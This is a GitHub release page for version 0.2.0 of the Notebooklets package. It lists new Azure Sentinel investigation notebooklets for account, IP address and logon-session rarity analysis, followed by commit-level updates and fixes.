Skip to content

Account Summary, IP Summary, Logon Session rarity notebooklets
Compare
Choose a tag to compare
@ianhelle ianhelle released this 13 May 18:43
v0.2.0
bf2a975
This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
GPG key ID: 4AEE18F83AFDEB23
Expired
Learn about vigilant mode.

The second release of Notebooklets has been a long time coming but finally here.
It includes 3 new notebooklets:

  • Account summary - explore an account (Azure/Office, Windows or Linux)
    Logon activity, Azure office activity, alerts, etc.
  • IP Address Summary - explore IP address:
    Threat intel, geolocation, whois plus checks for presence of IP in multiple Azure Sentinel logs
  • Logon session rarity
    Using clustering of processes to estimate the relative unusualness of individial logon sessions.
    Browse the sessions with unusual activity using event timelines or process trees.

Also support for MSTICPy pivot functions - loading Notebooklets package will add
notebooklet run functions as pivots to the appropriate entity (e.g. Host, Account, IP)

Updates

86c0865@Automated ReadtheDocs documentation for notebooklets
e3bc125@Logon session rarity notebooklet.
58c8e60@Adding print_options function to notebooklet.py
49e05a6@

  • Add data_viewers.py module for simple event browsing
  • Added Pivot initialization to the package init.py so that notebooklets are added as pivot functions
  • Created local version of convert_to_ip_entities that accepts geoip provider in args. This is used by ti_enrich, host.py, host_logons_summary.py and, indirectly, by ip_summary and network_flow_summary.
  • Added map_ips function to ip_tools - generic Folium map for list of IPs
  • Change notebooklet_result.py so that it only displays first 5 rows of DF and has explanatory text why not everything is showing.
    3d619cb@
  • Added some utility functions to common.py and notebooklet.py
    • check_valid_result_data
    • check_table_exists
    • get_methods/list_methods (lists only methods defined on subclasses, not Notebooklet class)
  • Split NotebooketResult into separate module notebooklet_result.py
  • Added ability to invoke notebooklet functions from results class
  • Added alert.py alert browser

Fixes

27db47e@Changed requirements for msticpy to be >=1.0.0
631a57d@Fixing docstring in ip_summary
d330b22@

  • Better formatting of options in help- added options doc string to notebooklet init.
  • Refactored large init function in notebooklet
    419cce1@Fixing tests that depend on GeoLiteLookup - replace with mock class.Temporary workaround for convert_to_ip_entities in host.py
    1d2cf20@Update azure-pipelines.yml for Azure PipelinesAdd maxmind auth key
    256f6ec@Fixing setup.py to read from requirements.txt
    e2e48e6@Update azure-pipelines.yml for Azure PipelinesAdd install of pytest-check
    0a88c16@Some test and linter fixes
    3d619cb@
  • Fixes/regularization to host.host.py and iptools.py. Added VPS lookup
  • Added several test data sets such as azure_activity_df, az_net_df (interface), vmcomputer_df, host_hb_df
  • Added mock classes for TILookup and GeoIP for testing
  • Switched several test modules to native pytest format.
    184a2af@
  • Update to add extra method to notebooklet base class for wrapped run method
  • Some fixes due to pandas TZ-specific changes and some of the test data.
  • Removed TimeSpan from common.py - now imported from msticpy.
    029753e@Add pivot support for notebooklets run method.
    ee1125e@
  • Update to add extra method to notebooklet base class for wrapped run method
  • Some fixes due to pandas TZ-specific changes and some of the test data.
  • Removed TimeStamp from common.py - now imported from msticpy.
    159d63f@Create CONTRIBUTING.md
    617ce20@Changing image sizes in readme. Spelling corrections
    99a3441@Documentation addition and update to README.md
    906da10@Update README.mdAdded link to the notebook and introductory text.
Assets 2
Loading